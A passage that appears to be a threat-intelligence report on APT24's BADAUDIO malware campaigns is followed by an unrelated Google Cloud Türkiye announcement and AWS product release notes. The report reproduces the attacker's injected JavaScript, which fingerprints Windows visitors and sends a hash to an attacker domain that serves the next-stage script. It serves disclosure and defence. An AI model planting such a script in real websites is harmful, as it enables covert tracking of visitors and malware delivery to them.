In one of these cases, the subsequent payload, decrypted using a hard-coded AES key, has been confirmed as Cobalt Strike Beacon. However, it is not confirmed that Cobalt Strike is present in every instance. The Beacon payload contained a relatively unique watermark that was previously observed in a separate APT24 campaign, shared in the Indicators of Compromise section. Cobalt Strike watermarks are a unique value generated from and tied to a given “CobaltStrike.auth” file. This value is embedded as the last 4 bytes for all BEACON stagers and in the embedded configuration for full backdoor BEACON samples.
Campaign Overview: BADAUDIO Delivery Evolves
Over three years, APT24 leveraged various techniques to deliver BADAUDIO, including strategic web compromises, repeated supply-chain compromise of a regional digital marketing firm in Taiwan, and spear phishing.
Figure 4: BADAUDIO campaign overview
Public Strategic Web Compromise Campaign
Beginning in November 2022 we observed over 20 compromised websites spanning a broad array of subjects from regional industrial concerns to recreational goods, suggesting an opportunistic approach to initial access with true targeting selectively executed against visitors the attackers identified via fingerprinting. The legitimate websites were weaponized through the injection of a malicious JavaScript payload.
Figure 5: Strategic web compromise attack flow to deliver BADAUDIO malware
This script exhibited an initial layer of targeting, specifically excluding macOS, iOS, Android, and various Microsoft Internet Explorer/Edge browser variants to focus exclusively on Windows systems. This selectivity suggests an adversary immediately narrowing their scope to optimize for a specific, likely high-value, victim profile.
The injected JavaScript performed a critical reconnaissance function by employing the FingerprintJS library to generate a unique browser fingerprint. This fingerprint, transmitted via an HTTP request to an attacker-controlled domain, served as an implicit validation mechanism. Upon successful validation, the victim was presented with a fabricated pop-up dialog, engineered to trick the user into downloading and executing BADAUDIO malware.
$(window).ready(function() {
var userAgent = navigator.userAgent;
var isIE = userAgent.indexOf("compatible") > -1 && userAgent.indexOf("MSIE") > -1;
var isEdge = userAgent.indexOf("Edge") > -1 && !isIE;
var isIE11 = userAgent.indexOf('Trident') > -1 && userAgent.indexOf("rv:11.0") > -1;
var isMac = userAgent.indexOf('Macintosh') > -1;
var isiPhone = userAgent.indexOf('iPhone') > -1;
var isFireFox = userAgent.indexOf('Firefox') > -1;
if (!isIE && !isEdge && !isIE11 && !isMac && !isiPhone && !isFireFox) {
var tag_script = document.createElement("script");
tag_script.type = "text/javascript";
tag_script.src = "https://cdn.jsdelivr.net/npm/@fingerprintjs/fingerprintjs@2/dist/fingerprint2.min.js";
tag_script.onload = "initFingerprintJS()";
document.body.appendChild(tag_script);
if (typeof(callback) !== "undefined") {
tag_script.onload = function() {
callback();
}
}
function callback() {
var option = {
excludes: {
screenResolution: true,
availableScreenResolution: true,
enumerateDevices: true
}
}
new Fingerprint2.get(option, function(components) {
var values = components.map(function(component) {
return component.value
})
var murmur = Fingerprint2.x64hash128(values.join(''), 31);
console.log(murmur)
var script_tag = document.createElement("script");
script_tag.setAttribute("src", "https://www[.]twisinbeth[.]com/query.php?id=" + murmur);
document.body.appendChild(script_tag);
});
}
}
});
Figure 6: Early malicious fingerprinting JS used in strategic web compromise campaigns
Figure 7: Example of attacker fake update pop-up dialog impersonating Chrome to lure targets to download and execute BADAUDIO malware
The attackers consistently shift their infrastructure, using a mix of newly registered domains and domains they have previously compromised. We last observed this tactic in early September 2025.
Escalation: Supply Chain Compromise for Strategic Web Compromises at Scale
In July 2024, APT24 compromised a regional digital marketing firm in Taiwan- a supply chain attack that impacted more than 1,000 domains. Notably, the firm experienced multiple re-compromises over the last year, demonstrating APT24’s persistent commitment to the operation.
We initiated a multifaceted remediation effort to disrupt these threats. In addition to developing custom logic to identify and block the modified, malicious JavaScript, GTIG distributed victim notifications to the individual compromised websites and the compromised marketing firm. These notifications provided specific details about the threat and the modifications made to the original script, enabling affected organizations to secure their sites and prevent future infections.
In the first iteration of the supply chain compromise, APT24 injected the malicious script into a widely used JavaScript library (MITRE ATT&CK T1195.001) provided by the firm, leveraging a typosquatting domain to impersonate a legitimate Content Delivery Network (CDN). The deobfuscated JavaScript reveals a multi-stage infection chain:
Dynamic Dependency Loading: The script dynamically loads legitimate jQuery and FingerprintJS2 libraries (MITRE ATT&CK T1059.007) from a public CDN if not already present, ensuring consistent execution across diverse web environments.
Multi-Layer JS Concealment: During a re-compromise discovered in July 2025, the adversary took additional steps to hide their malicious code. The highly obfuscated script (MITRE ATT&CK T1059) was deliberately placed within a maliciously modified JSON file served by the vendor, which was then loaded and executed by another compromised JavaScript file. This tactic effectively concealed the final payload in a file type and structure not typically associated with code execution.
Advanced Fingerprinting: FingerprintJS2 is utilized to generate an x64hash128 browser and environmental fingerprint (MITRE ATT&CK T1082) . The x64hash128 is the resulting 128-bit hash value produced by the MurmurHash3 algorithm, which processes a large input string of collected browser characteristics (such as screen resolution, installed fonts, and GPU details) to create a unique, consistent identifier for the user’s device.
Covert Data Exfiltration and Staging: A POST request, transmitting Base64-encoded reconnaissance data (including host, url, useragent, fingerprint, referrer, time, and a unique identifier), is sent to an attacker’s endpoint (MITRE ATT&CK T1041).
Adaptive Payload Delivery: Successful C2 responses trigger the dynamic loading of a subsequent script from a URL provided in the response’s data field. This cloaked redirect leads to BADAUDIO landing pages, contingent on the attacker’s C2 logic and fingerprint assessment (MITRE ATT&CK T1105).
Tailored Targeting: The compromise in June 2025 initially employed conditional script loading based on a unique web ID (the specific domain name) related to the website using the compromised third-party scripts. This suggests tailored targeting, limiting the strategic web compromise (MITRE ATT&CK T1189) to a single domain. However, for a ten-day period in August, the conditions were temporarily lifted, allowing all 1,000 domains using the scripts to be compromised before the original restriction was reimposed.
Complementing their broader web-based attacks, APT24 concurrently conducted highly targeted social engineering campaigns. Lures, such as an email purporting to be from an animal rescue organization, leveraged social engineering to elicit user interaction and drive direct malware downloads from attacker-controlled domains.
Separate campaigns abused legitimate cloud storage platforms including Google Drive and OneDrive to distribute encrypted archives containing BADAUDIO. Google protected users by diverting these messages to spam, disrupting the threat actor’s effort to leverage reputable services in their campaigns.
APT24 included pixel tracking links, confirming email opens and potentially validating target interest for subsequent exploitation. This dual-pronged approach—leveraging widely trusted cloud services and explicit tracking—enhances their ability to conduct effective, personalized campaigns.
Outlook
This nearly three-year campaign is a clear example of the continued evolution of APT24’s operational capabilities and highlights the sophistication of PRC-nexus threat actors. The use of advanced techniques like supply chain compromise, multi-layered social engineering, and the abuse of legitimate cloud services demonstrates the actor’s capacity for persistent and adaptive espionage.
This activity follows a broader trend GTIG has observed of PRC-nexus threat actors increasingly employing stealthy tactics to avoid detection. GTIG actively monitors ongoing threats from actors like APT24 to protect users and customers. As part of this effort, Google continuously updates its protections and has taken specific action against this campaign.
We are committed to sharing our findings with the security community to raise awareness and to disrupt this activity. We hope that improved understanding of tactics and techniques will enhance threat hunting capabilities and lead to stronger user protections across the industry.
Acknowledgements
This analysis would not have been possible without the assistance from FLARE. We would like to specifically thank Ray Leong, Jay Gibble and Jon Daniels for their contributions to the analysis and detections for BADAUDIO.
We are excited to announce plans to bring a new Google Cloud region to Türkiye, as part of Google’s 10-year, $2 billion investment in the country.
The establishment of this world-class digital infrastructure, in collaboration with Turkcell, marks a significant multi-year investment to accelerate digital transformation in Türkiye and cloud innovation across the region.
“The partnership between Google Cloud and Turkcell will further accelerate Türkiye’s digital transformation journey. It reflects the confidence of global technology leaders in the strength, resilience, and innovation capacity of our economy. By integrating advanced data infrastructure and next-generation cloud technologies into our digital ecosystem, this alliance will enhance efficiency and foster innovation across public and private sectors. Furthermore, it supports our long-term vision of strengthening digital sovereignty and positioning Türkiye as a regional hub for technology, connectivity, and sustainable growth.” Cevdet Yılmaz, Vice President of the Republic of Türkiye
“Our partnership with Google Cloud clearly reinforces Turkcell’s leadership in driving Türkiye’s digital transformation. This strategic partnership is more than a technology investment — it is a milestone for Türkiye’s digital future, accelerating our national vision by leveraging Google Cloud’s global technologies and unlocking opportunities for AI innovations. This collaboration gives our customers seamless access to Google Cloud’s cutting-edge capabilities. This new Google Cloud region will enable enterprises to innovate faster and compete globally. As part of this partnership Turkcell plans to invest $1 billion in data centers and cloud technologies.” – Dr. Ali Taha Koç, CEO, Turkcell
When it is open, the Türkiye region will help meet growing customer demand for cloud services and AI-driven innovation in the country and across EMEA, delivering high-performance services that make it easier for organizations to serve their end users faster, securely, and reliably. Local customers and partners will benefit from key controls that enable them to maintain low latency and the highest international security and data protection standards.
“Cloud technologies are a critical enabler of the financial sector’s ongoing digital transformation. With Google Cloud’s new region in Türkiye, Garanti BBVA will be able to strengthen its operational resilience while continuing to innovate by securely deploying artificial intelligence and advanced data analytics. This collaboration reinforces our commitment to delivering reliable, high-performance digital services to our customers, while ensuring that data sovereignty, privacy, and trust remain at the core of everything we do.” —İlker Kuruöz, Garanti BBVA
“As a global airline connecting Türkiye to the world, Turkish Airlines relies on high-performance, resilient technology to deliver an uninterrupted customer journey, 24/7. Google Cloud’s plan to launch a local region in Türkiye, combined with its global network, is a game-changer for our flight operations, passenger systems, and data-intensive applications. Having hyperscale cloud infrastructure closer to home ensures the low latency required to adopt advanced analytics, robust cybersecurity solutions, and future AI capabilities, accelerating our digital strategy and reinforcing our commitment to service excellence.” — Kerem Kızıltunç, Turkish Airlines
“Yapı Kredi is focused on continuous innovation and modernizing our core banking infrastructure to deliver a limitless banking experience to our customers. The planned Google Cloud region in Türkiye provides the robust, scalable, and secure infrastructure of a hyperscale cloud, which is necessary to power our advanced artificial intelligence and cybersecurity initiatives. This local presence will significantly enhance the performance and flexibility needed to support our growth and empower us to build the next generation of secure, digital-first financial products.” — Gökhan Özdinç, Yapı Kredi Bank
With 42 regions and 127 zones currently in operation around the world, Google Cloud’s global network of cloud regions forms the foundation to support customers of all sizes and across industries. From retail and media and entertainment to financial services, healthcare and the public sector, leading organizations come to Google Cloud as their trusted technology partner.
Key features of the Google Cloud region in Türkiye will include:
Advanced capabilities and technologies: The region will deliver leading Google Cloud services across data analytics, cybersecurity and digital business solutions. Google’s cutting-edge AI innovations will strengthen Türkiye’s digital ecosystem and enable enterprises and public sector entities to operate with greater efficiency, speed and security.
Uncompromising data sovereignty and security: The new region in Türkiye will benefit from our robust infrastructure, including data encryption at rest and in transit, granular data access controls, data residency, and sophisticated threat detection systems. We adhere to the highest international security and data protection standards to help ensure the confidentiality, integrity, and sovereignty of your data.
High performance and low latency: Serves end users across Türkiye and neighboring countries with fast, low latency experiences, and transfers large amounts of data between networks easily across Google’s global network.
Scalability and flexibility on demand: Google Cloud’s infrastructure is designed to scale easily with any business. Whether you’re a small startup or a large corporation, you can easily adjust your resources to meet your evolving needs.
AWS Step Functions enhances the TestState API to support local unit testing of workflows, allowing you to validate your workflow logic, including advanced patterns like Map and Parallel states, without deploying state machines to your AWS account.
AWS Step Functions is a visual workflow service capable of orchestrating over 14,000+ API actions from over 220 AWS services to build distributed applications and data processing workloads. The TestState API now supports testing of complete workflows including error handling patterns in your local development environment. You can now mock AWS service integrations, with optional API contract validation that verifies your mocked responses match the expected responses from actual AWS services, helping ensure your workflows work correctly in production. You can integrate TestState API calls into your preferred testing frameworks such as Jest and pytest and CI/CD pipelines, enabling automated workflow testing as part of your development process. These capabilities help accelerate development by providing instant feedback on workflow definitions, enabling validation of workflow behavior in your local environment, and catching potential issues earlier in the development cycle.
The enhanced TestState API is available through the AWS SDK in all AWS Regions where Step Functions is available. For a complete list of regions and service offerings, see AWS Regions.
To get started, you can access the TestState API through the AWS SDK, AWS CLI, or check out the AWS Step Functions Developer Guide.
Amazon Aurora DSQL now provides statement-level cost estimates in query plans, giving developers immediate insight into the resources consumed by individual SQL statements. This enhancement surfaces Distributed Processing Unit (DPU) usage estimates directly within the query plan output, helping developers identify workload cost drivers, tune query performance, and better forecast resource usage.
With this launch, Aurora DSQL appends per-category (compute, read, write, and multi-Region write) and total estimated DPU usage at the end of the EXPLAIN ANALYZE VERBOSE plan output. The feature complements CloudWatch metrics by providing fine-grained, real-time visibility into query costs.
Amazon EC2 High Memory U7i instances with 16TB of memory (u7in-16tb.224xlarge) are now available in the AWS Europe (Ireland) region, U7i instances with 12TB of memory (u7i-12tb.224xlarge) are now available in the AWS Asia Pacific (Hyderabad), and U7i instances with 8TB of memory (u7i-8tb.112xlarge) are now available in the Asia Pacific (Mumbai) and AWS GovCloud (US-West) region. U7i instances are part of AWS 7th generation and are powered by custom fourth generation Intel Xeon Scalable Processors (Sapphire Rapids). U7in-16tb instances offer 16TiB of DDR5 memory, U7i-12tb instances offer 12TiB of DDR5 memory, and U7i-8tb instances offer 8TiB of DDR5 memory, enabling customers to scale transaction processing throughput in a fast-growing data environment.
U7i-8tb instances offer 448 vCPUs, support up to 100Gbps Elastic Block Storage (EBS) for faster data loading and backups, deliver up to 100Gbps of network bandwidth, and support ENA Express. U7i-12tb instances offer 896 vCPUs, support up to 100Gbps Elastic Block Storage (EBS) for faster data loading and backups, deliver up to 100Gbps of network bandwidth, and support ENA Express. U7in-16tb instances offer 896 vCPUs, support up to 100Gbps Elastic Block Storage (EBS) for faster data loading and backups, deliver up to 200Gbps of network bandwidth, and support ENA Express. U7i instances are ideal for customers using mission-critical in-memory databases like SAP HANA, Oracle, and SQL Server.
Amazon Braket now offers access to IBEX Q1, a trapped-ion quantum processing unit (QPU) from Alpine Quantum Technologies (AQT), a new quantum hardware provider on Amazon Braket. IBEX Q1 is a 12-qubit system with all-to-all connectivity, enabling any qubit to directly interact with any other qubit without requiring intermediate SWAP gates.
With this launch, customers now have on-demand access to AQT’s trapped-ion technology for building and testing quantum programs, and priority access via Hybrid Jobs for running variational quantum algorithms – all with pay-as-you-go pricing. Customers can also reserve dedicated capacity on this QPU for time-sensitive workloads via Braket Direct with hourly pricing and no upfront commitments.
At launch, IBEX Q1 is available Tuesdays and Wednesdays from 09:00 to 16:00 UTC, providing customers in European time zones convenient access during their work hours. IBEX Q1 is accessible from the Europe (Stockholm) Region.
Amazon Quick Sight now supports comprehensive theming capabilities that enable organizations to maintain consistent brand identity across their analytics dashboards. Authors can customize interactive sheet backgrounds with gradient colors and angles, implement sophisticated card styling with configurable borders and opacity, and control typography for visual titles and subtitles at the theme level.
These enhancements address critical enterprise needs including maintaining corporate visual identity and creating seamless embedded analytics experiences. With theme-level controls, organizations can ensure visual consistency across departments while enabling embedded dashboards to match host application styling. The theming capabilities are particularly valuable for embedded analytics scenarios, as the features enable dashboards to appear native within host applications, enhancing the overall professional appearance and user experience.